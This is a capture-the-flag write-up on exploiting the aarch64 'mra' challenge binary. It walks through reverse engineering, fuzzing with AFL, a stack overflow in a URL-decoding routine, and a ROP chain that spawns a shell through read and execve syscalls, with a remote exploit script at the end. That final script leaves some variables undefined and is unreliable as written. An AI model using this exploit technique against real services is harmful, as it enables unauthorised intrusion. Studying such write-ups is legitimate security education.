# mra: pwn/rev
(Sorry for the formatting; it looks a lot better at the original link: https://github.com/b01lers/b01lers-library/blob/master/2021OOO/pwn/mra/solve.md)
Files for this challenge are attached in the directory.

## Initial Analysis

So we get a binary called mra. First things first, some standard checklist items:


❯ file mra
mra: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, stripped


Ok, aarch64. It's also statically linked, so we won't be doing any ret2libc here.
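
For the curious, here is a minimal sketch of where `file` gets that line from, assuming only the standard ELF header layout. The `describe_elf` helper and the synthetic header are made up for illustration and are not part of the challenge files.

```python
import struct

# e_machine values from the ELF specification (small subset).
EM_NAMES = {3: "x86", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def describe_elf(header: bytes) -> str:
    """Summarise the first 20 bytes of an ELF file, roughly like `file` does."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    bits = {1: 32, 2: 64}[header[4]]        # EI_CLASS
    endian = {1: "<", 2: ">"}[header[5]]    # EI_DATA: 1 = LSB, 2 = MSB
    # e_type and e_machine are two 16-bit fields right after the 16-byte e_ident.
    e_type, e_machine = struct.unpack_from(endian + "HH", header, 16)
    order = "LSB" if endian == "<" else "MSB"
    return f"ELF {bits}-bit {order}, {EM_NAMES.get(e_machine, hex(e_machine))}"


# Synthetic header: 64-bit, little-endian, ET_EXEC (2), EM_AARCH64 (183).
sample = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 2, 183)
print(describe_elf(sample))
```

To try it on the real binary, pass `open("mra", "rb").read(20)` instead of `sample`.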


❯ checksec mra
[*] '/home/novafacing/hub/b01lers-library/2021OOO/pwn/mra/mra'
Arch: aarch64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)


So we have no canary and no PIE, but NX is on. That rules out shellcode on the stack, so most likely we're going to need to ROP to succeed here. Of course, I haven't opened the binary at this point so that's just conjecture ;)

I started working on this challenge in Ghidra, but had a pretty rough time exploring the disassembly (we'll see why shortly). I ended up switching to [cutter](https://cutter.re) late in the competition with *much* more success. I won't include any of my Ghidra snips here, but they happened and I did use Ghidra to identify all of the library functions before switching over during the "what the heck is the actual exploit here" stage.

As usual, we want to start by finding main. Luckily here that's pretty easy, it'll be the first argument to __libc_start_main in entry0 (called entry by Ghidra). Jump in there and we see that main is at 0x40033c. For whatever reason, cutter had some issues identifying xrefs to main. I couldn't figure out why, but I already knew where it was thanks to Ghidra, so this didn't hold me up.

In main, we'll see several function calls. I'll briefly explain what made me guess each one (I ended up being 100% right!).

1. fcn.00401018(**(int64_t **)0x41cf80, 0, 2, 0); clearly this is setvbuf. lol.
2. fcn.00405ba0 you can either guess from params or just look at [the source](https://github.com/bminor/glibc/blob/3cc4a8367c23582b7db14cf4e150e4068b7fd461/string/memset.c) that this is definitely memset with all its weird optimized copies. Never change, glibc. No seriously, don't change or these challenges will be much harder.
3. uStack28 = fcn.004064f8(0, (int64_t)auStack1128, 0x3ff); This one is a little trickier. If we click into it, we'll see this is basically a wrapper for fcn.00408624 which in turn wraps fcn.00408588:

asm
fcn.00408684 (int64_t arg1, int64_t arg2, int64_t arg3, int64_t arg4);
; arg int64_t arg1 @ x0
; arg int64_t arg2 @ x1
; arg int64_t arg3 @ x2
; arg int64_t arg4 @ x3
0x00408688 stur x0, [sp, -8] ; arg1
0x0040868c stur x1, [sp, -0x10] ; arg2
0x00408690 stur x2, [sp, -0x18] ; arg3
0x00408694 stur x3, [sp, -0x20] ; arg4
0x00408698 ldur x8, [sp, -8] ; 8
0x0040869c ldur x0, [sp, -0x10] ; 16
0x004086a0 ldur x1, [sp, -0x18] ; 24
0x004086a4 ldur x2, [sp, -0x20] ; 0x178000
;-- syscall.0.9:
0x004086a8 svc 0
0x004086ac sub sp, sp, 0x20
0x004086b0 ret

Here is where I learned that syscalls in aarch64 are mercifully pretty simple. They're all listed by syscall number in [the ~~bible~~ source](https://github.com/torvalds/linux/blob/master/include/uapi/asm-generic/unistd.h). We know that this one is syscall #0x3f from the outer function: the syscall number is passed in x8 on aarch64, so when we see fcn.00408624(0x3f, (int64_t)iStack000000000000002c, arg2, arg3, 0, 0, 0); we know pretty well this is a read syscall (0x3f is 63, which is read in that table). So, we can just call that outer function read (it's the libc wrapper for the syscall).

4. fcn.00405eb0((int64_t)auStack1128, (int64_t)pcStack16, 0xf) pcStack16 = "GET /api/isodd/" is right up above here, and is 0xf characters long. Doesn't take a super genius to realize this is strncmp.
5. If we look at the arguments to fcn.00405ca8, we come up with the list 0xa (\n), 0x3f (?), 0x2f (/). These are all pretty reasonable things to, well, strchr for in a URL. You could try and reverse it but...it's similarly optimized to memset and pretty gross.
6. Similar deal with fcn.00406358, the args tell us this is *almost certainly* strstr.
7. Similarly to strncmp, we can identify strcmp pretty easily by just looking at the args and checking the code quickly to see that it walks both strings and returns the difference between the two bytes at the first mismatch. This is pretty indicative of strcmp behavior.
8. sprintf is located at 0x400d88, and once again we can basically tell this by the args. We can also stop our debugger there and see that yes, the buffer gets copied into. Easy!
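
The syscall identification in item 3 boils down to a table lookup on the value that lands in x8. Here's a minimal sketch of that lookup, with a handful of numbers copied from asm-generic/unistd.h. The `syscall_name` helper is just an illustrative name, not something from the binary.

```python
# Small subset of include/uapi/asm-generic/unistd.h, which aarch64 Linux uses.
AARCH64_SYSCALLS = {
    56: "openat",
    57: "close",
    63: "read",
    64: "write",
    93: "exit",
    221: "execve",
}


def syscall_name(x8: int) -> str:
    """Map the value passed in x8 to a syscall name, if it is in the table."""
    return AARCH64_SYSCALLS.get(x8, f"unknown ({x8:#x})")


print(syscall_name(0x3F))  # read
print(syscall_name(0xDD))  # execve
```

The same lookup comes in handy later, since 0xdd is the number the final exploit uses.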

There are also puts and printf at 0x400f14 and 0x400e4c, respectively. The exploit happens before these calls though. Anyway, if we put in all these calls, it becomes pretty clear that the program expects an input format of something like GET /api/isodd/(0-9)+?token=(enterprise|premium|public). We can try some inputs, the answer comes back right! But where's the bug?
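
As a rough sketch of that request format, here it is as a Python regex. This is only an approximation for sanity-checking inputs: the binary itself parses with strncmp/strchr/strstr, and `REQUEST_RE` and `parse_request` are names I'm making up here.

```python
import re

# Approximation of the accepted request line (assumption: digits only,
# one of the three token names). The real parser is not regex-based.
REQUEST_RE = re.compile(
    rb"^GET /api/isodd/(?P<number>[0-9]+)\?token=(?P<token>enterprise|premium|public)"
)


def parse_request(line: bytes):
    """Return (number, token) as bytes, or None if the line doesn't fit."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    return m.group("number"), m.group("token")


print(parse_request(b"GET /api/isodd/3?token=enterprise"))
print(parse_request(b"POST /api/isodd/3?token=enterprise"))
```

Anything this accepts is a "well-behaved" request; the interesting inputs are the ones it rejects.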

There are a couple functions I haven't mentioned yet. That's because it's time for our next section:

## Finding the Bug!

This is a pwn challenge, and therefore there must be a bug (or a few, but in this case there is basically just one). The function at 0x4001d0, which I called helper_with_copy, has some gross looking C code in Ghidra, so I retyped it out (as fun_4001d0 here):

c
#include <stdint.h>

char hex_to_dec(int64_t inp);

int32_t fun_4001d0(char *output, char *input) {
    int in_index = 0;
    int out_index = 0;
    char cur;

    // Stops only on a NUL in the input; the output size is never checked
    while ((cur = input[in_index]) != 0) {
        if (cur == '%') {
            char tmp = hex_to_dec(input[in_index + 1]);
            cur = hex_to_dec(input[in_index + 2]);
            cur = (char)(((tmp & 0xff) << 4) | cur); // Make 8 bit value from %0f hex
            in_index += 3;
        } else {
            in_index++;
        }
        output[out_index] = cur;
        out_index++;
    }
    return out_index;
}


This gets called with two arguments. Argument 0 is where we copy *to* and argument 1 is where we copy *from*, which ends up being (with a normal input) the number we want to test for oddness. We're gonna get around that a bit. The output is a stack buffer that I'm honestly still not sure the size of, but it's not big enough. Basically what happens is we just keep copying while the current character of the input is not 0, with no check on how much has been written. So...if we want to overflow, save your nullbytes! Helpfully, the authors also convert any strings like %0f to the actual byte value and save it to the output. Neat! That happens with this code:

c
#include <stdint.h>

char hex_to_dec(int64_t inp)
{
    uint8_t _inp;
    char reg;
    _inp = (uint8_t)inp;
    // if not 0-9:
    if ((_inp < 0x30) || (0x39 < _inp)) {
        // if not a-f
        if ((_inp < 0x61) || (0x66 < _inp)) {
            // if not A-F
            if ((_inp < 0x41) || (0x46 < _inp)) {
                // If we are not 0-9, not a-f, and not A-F, set to 0
                reg = '0';
            } else {
                // We are A-F, subtract 0x37 (0x41 - 0x37 == 10)
                reg = _inp - 0x37;
            }
        } else {
            // We are a-f, add 0xa9 (('a' + 0xa9) % 256 == 10)
            reg = _inp + 0xa9;
        }
    } else {
        // If it is 0-9, we convert to the integer 0-9
        reg = _inp - 0x30;
    }
    return reg;
}
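
To play with the decoder without a debugger, here's a rough Python model of the two functions. It's a sketch of my reading of the listings, not the binary's exact behavior: `percent_decode` is a made-up name, and running off the end of the Python buffer is treated as hitting a NUL.

```python
def hex_to_dec(c: int) -> int:
    """Python port of the nibble helper from the listing."""
    if 0x30 <= c <= 0x39:          # '0'-'9'
        return c - 0x30
    if 0x61 <= c <= 0x66:          # 'a'-'f'
        return (c + 0xA9) & 0xFF
    if 0x41 <= c <= 0x46:          # 'A'-'F'
        return c - 0x37
    return 0x30                    # fallback value '0', as written in the listing


def percent_decode(src: bytes) -> bytes:
    """Model of fun_4001d0: copy until a NUL in the *input*, no output bound."""
    def at(i: int) -> int:
        return src[i] if i < len(src) else 0   # assumption: end of buffer acts as NUL

    out = bytearray()
    i = 0
    while at(i) != 0:
        cur = at(i)
        if cur == ord("%"):
            cur = ((hex_to_dec(at(i + 1)) << 4) | hex_to_dec(at(i + 2))) & 0xFF
            i += 3
        else:
            i += 1
        out.append(cur)
    return bytes(out)


decoded = percent_decode(b"12%00%41%0f")
print(decoded)       # b'12\x00A\x0f'
print(len(decoded))  # 5
```

Note that %00 writes a zero byte to the output without stopping the loop, because the termination check only looks at the raw input. That's what lets full 8-byte addresses with zero upper bytes survive the copy.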


If you're thinking "hey, that's pretty suspicious!", you're right. I thought so too, but I didn't really want to mess around too much to figure out exactly how to exploit this, so I turned to my friend AFL (specifically [AFL-Other-Arch](https://github.com/shellphish/afl-other-arch)). I used AFL with the following test cases:


GET /api/isodd/1234567890?token=enterprise
GET /api/isodd/1?token=public
GET /api/isodd/3?token=enterprise
GET HTTP /api/isodd/%01%ff%ab%ce?token=enterprise
GET /api/isodd/999999?token=public
GET /api/isodd/999999999999?token=enterprise


Then I just ran it with afl-fuzz -Q -i ./testcases -o ./outputs -- ./mra and let it get to work. Within 20 minutes it had found a few thousand crashes, so I figured it was probably time to figure out which ones were worth using. Basically, I figured that I know there's a buffer overflow, so we can reasonably expect $pc control from a good exploit. So I filtered the results for just that using this script:

python
from pwn import *
from subprocess import run, PIPE
from pathlib import Path
import re
from binascii import hexlify

# gdb prints $pc as e.g. "$1 = (void (*)()) 0x3434343434343434"
PC_REG = r"\(void \(\*\)\(\)\) (0x[0-9a-f]+)"
BT_REG = r"0x[0-9a-f]{16}"
SRCTEMPLATE = """target remote localhost:{}
c
p $pc
bt
q"""

# Too many open files thanks OSError -_-
files = []
procs = []

testcases = Path("outputs2/crashes")

for portbase, testcase in enumerate(testcases.iterdir()):
    # Again...just to make sure the file descriptors close
    for f in files:
        try:
            f.close()
        except:
            pass
    for f in procs:
        try:
            f.kill()
        except:
            pass

    files = []
    procs = []

    tc = testcase
    port = portbase + 10000
    # Open our actual testcase file
    with open(tc, "rb") as tcc:
        files.append(tcc)
        content = tcc.read()
    # Start a qemu debug process
    r = process(["qemu-aarch64-static", "-g", str(port), "./mra"])
    procs.append(r)
    print(content)
    try:
        # Send the testcase to the process
        r.sendline(content)
    except:
        continue
    with open("gdbscript.gdb", "w") as srcfile:
        srcfile.write(SRCTEMPLATE.format(port))
    try:
        # Try and attach to the process and run the debugger script to collect the info
        proc = run(["gdb-multiarch", "-q", "-x", "gdbscript.gdb"], stdout=PIPE, stderr=PIPE, timeout=5)
        op = proc.stdout
    except:
        # run() already kills gdb on timeout, so only the target needs closing
        try:
            r.close()
        except:
            pass
        continue

    # Print out the crashes, backtrace
    print("CRASHES========================")
    found_crashes = re.findall(PC_REG, op.decode("utf-8", errors="ignore"))
    print(found_crashes)
    print("BT=============================")
    backtrace = re.findall(BT_REG, op.decode("utf-8", errors="ignore"))
    print(backtrace)
    print("===============================")

    # STUPID BAD AND DUMB HEURISTIC for seeing if we control $pc
    hinput = hexlify(content)
    for f in found_crashes:
        check = bytes(hex(int(f, 16))[2:], "utf-8")
        print("==========CHECK: ", check, " IN ", hinput)
        if check in hinput:
            # Append so earlier candidates are not overwritten
            with open("goodcandidate.txt", "ab") as goods:
                goods.write(content)
                goods.write(b"\n==DONE==\n")
                goods.write(bytes(str(found_crashes), "utf-8"))
                goods.write(bytes(str(backtrace), "utf-8"))
    try:
        r.recv(timeout=2)
    except:
        pass
    try:
        r.close()
    except:
        pass

Now, is this overkill? Probably. Did it work? Also yes. Really you could have just not put a question mark or newline until the end of your input and it would also work. But this is a pretty fun way to solve. This script will write any inputs that successfully cause $pc to be part of the input (a bad heuristic in the general case but who cares) to the goodcandidate.txt file.
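
If you want a slightly less dumb version of that heuristic, one option is to compare raw bytes in memory order instead of hex text. This is a sketch of that idea only, not what I ran during the CTF. `controls_pc` is a hypothetical helper, and it will miss bytes that only exist in the input as %xx escapes.

```python
def controls_pc(content: bytes, pc: int, min_bytes: int = 4) -> bool:
    """True if the low `min_bytes` bytes of pc, in little-endian memory
    order, appear somewhere in the raw test case."""
    needle = pc.to_bytes(8, "little")[:min_bytes]
    return needle in content


crash_input = b"GET /api/isodd/" + b"4" * 64
print(controls_pc(crash_input, 0x3434343434343434))  # True
print(controls_pc(crash_input, 0x0000000000400ABC))  # False
```

Comparing hex digits in printed order only lines up when the bytes read the same in both directions (like a run of '4'), which happens to be exactly the kind of crash the fuzzer found.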

Anyway, I got a good candidate from one of my testcases:


GET /api/isodd/1234%8934%pris%d4444444>444444444444M444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444pris444444444444444444444444444444444444444444444444444444444444444444444isodd/444444!444444444444444444444444444444444444444api/444444444444444444444444444444F4444444444444@44444444444444444444444444444????pris?34%%%%%'%%%B4


Okay. So to validate this, I just plugged it into gdb and ran it normally, then printed out the stack around it with x/20xg $sp. Oops, all '4'! Now is when I looked up some good aarch64 ROP writeups [^1] and got a little freaked out by the fact that aarch64 actually doesn't return to whatever is on top of the stack (because of course it doesn't). Instead, it rets to x30. Great. But the page got me somewhere: I knew I didn't want to mess around with having a bunch of gadgets. That's fine, because if you take a look at where nullbytes get placed due to read sizes, you'll realize we get a max of 5 gadgets anyway (I use 2 but "gadget" is a generous term).

I replaced the '4' string with a pwntools cyclic string to figure out exactly where I needed to stick my payload, and got started crafting an exploit. I decided to not bother trying to rop to syscall or anything like that, because we're statically linked and we already have helper functions that call syscalls with our arguments, AND they take the syscall arguments from the stack for us. And we control the stack. It's extremely simple to get going. The key is this block:

asm
0x004085a8 ldur x8, [sp, -8] ; 8
0x004085ac ldur x0, [sp, -0x10] ; 16
0x004085b0 ldur x1, [sp, -0x18] ; 24
0x004085b4 ldur x2, [sp, -0x20] ; 32
0x004085b8 ldur x3, [sp, -0x28] ; 40
0x004085bc ldur x4, [sp, -0x30] ; 48
0x004085c0 ldur x5, [sp, -0x38] ; 56
0x004085c4 svc 0
0x004085c8 sub sp, sp, 0x40
0x004085cc ret

What this does is load 7 values, starting at $sp-8 and going down to $sp-0x38, into registers (the first one being the syscall number) and then execute an svc, which is a supervisor call (basically equivalent to int 0x80 on x86 or syscall on x86_64). We control everything on the stack up to this point, so we can leverage this to execute any syscall we want with any arguments. Naturally, I'll do execve("/bin/sh\x00", NULL, NULL).

We have a problem though: I don't have a stack leak (and can't get one), and I still need that first argument in x0 to be a pointer to /bin/sh\x00. My solution to this is to execute two syscalls:

1. read into an area in .data with a particular address (thanks no-pie!) the string /bin/sh\x00.
2. execve now with the first argument as that pointer.
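
To make the stack layout for that ldur block concrete, here's a minimal sketch of the bytes that have to sit just below sp when it runs. The `svc_frame` helper is hypothetical and `BINSH_ADDR` is a placeholder value I picked for illustration, not the address used in the real exploit.

```python
import struct

SYS_EXECVE = 221  # 0xdd in asm-generic/unistd.h


def svc_frame(x8, x0=0, x1=0, x2=0, x3=0, x4=0, x5=0) -> bytes:
    """Bytes that must occupy [sp-0x38, sp) when the ldur block executes."""
    # Lowest address first: x5 is loaded from sp-0x38, x8 from sp-8.
    return struct.pack("<7Q", x5, x4, x3, x2, x1, x0, x8)


BINSH_ADDR = 0x41D000  # placeholder (assumption): some writable no-PIE address

frame = svc_frame(SYS_EXECVE, x0=BINSH_ADDR)
print(len(frame))        # 56
print(frame[-8:].hex())  # dd00000000000000
```

Since the loads use negative offsets from sp, the syscall number ends up at the highest address of the frame and the later arguments sit below it.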

Notice that sub sp, sp, 0x40 at the beginning? That's problematic, because I don't have arbitrary data in that location, so I wouldn't be able to get my args into execve after the first call. The solution: just run the read glibc wrapper function from the beginning instead! It already provides everything but the buffer to read into for us. From there, the rest is trivial, and the final script looks like this:

python
from pwn import *

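context.arch = "aarch64"
context.bits = 64

portbase = 1
port = portbase + 10000

# converts an int like 0x400 to a properly setup string like %00%04%00%00%00%00%00%00
# Remember when I said the authors were nice?
def a2pp(value):
    # The def line and `sep` are reconstructed (an assumption): split the hex
    # digits into big-endian byte pairs, which the map below reverses
    digits = b"%x" % value
    digits = digits.rjust(len(digits) + len(digits) % 2, b"0")
    sep = [digits[i:i + 2] for i in range(0, len(digits), 2)]
    new = list(map(lambda l: b"%" + l.rjust(2, b"0"), reversed(sep)))
    while len(new) < 8:
        new.append(b"%00")
    return b"".join(new)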

pad += a2pp(0xdd) # syscall num for execve
pad += a2pp(0x004085a8) # sp - 8 -> sp - 0x38 -> regs x8, 0,1,2,3,4,5 && syscall
pad += a2pp(0x9) # 9 bytes to read, length of binsh + newline (so could be 8 I guess)
# Ugly because it's just from the fuzzer and I didn't really change anything. lol
content = b"GET /api/isodd/1236%\x00\x008936%pris%d6666666>" + xrep + b"VVVV/666666!666666666666666666666666666666666666666api/666666666666666666666666666666F6666666666666@66666666666666666666666666666\x15????pris?\x16\x1636%\x00%%%%'%\x7f%%B6\x03"

# This isn't really necessary
content += b"1" * (0x3ff - len(content))

r = remote("mra.challenges.ooo", 8000)
print()
print("Sending ", content)
r.send(content)
r.sendline(b"/bin/sh\x00")
# Shell!
r.interactive()
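
For reference, the same little-endian percent-encoding can be sketched with struct. This is an alternative formulation under my own naming (`percent_encode_u64`), not the helper from the script.

```python
import struct


def percent_encode_u64(value: int) -> bytes:
    """Encode a 64-bit value as eight little-endian %xx escapes."""
    return b"".join(b"%%%02x" % b for b in struct.pack("<Q", value))


print(percent_encode_u64(0x400))       # b'%00%04%00%00%00%00%00%00'
print(percent_encode_u64(0x004085A8))  # b'%a8%85%40%00%00%00%00%00'
```

Every byte gets escaped, including the zero ones, so the result can be dropped straight into the request without terminating the copy loop early.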


[^1]: [Perfect Blue's Excellent aarch64 ROP writeup](https://web.archive.org/web/20210503022008/https://blog.perfect.blue/ROPing-on-Aarch64) because I didn't know a whole lot about aarch64 pwn.

Original writeup (https://github.com/b01lers/b01lers-library/blob/master/2021OOO/pwn/mra/solve.md).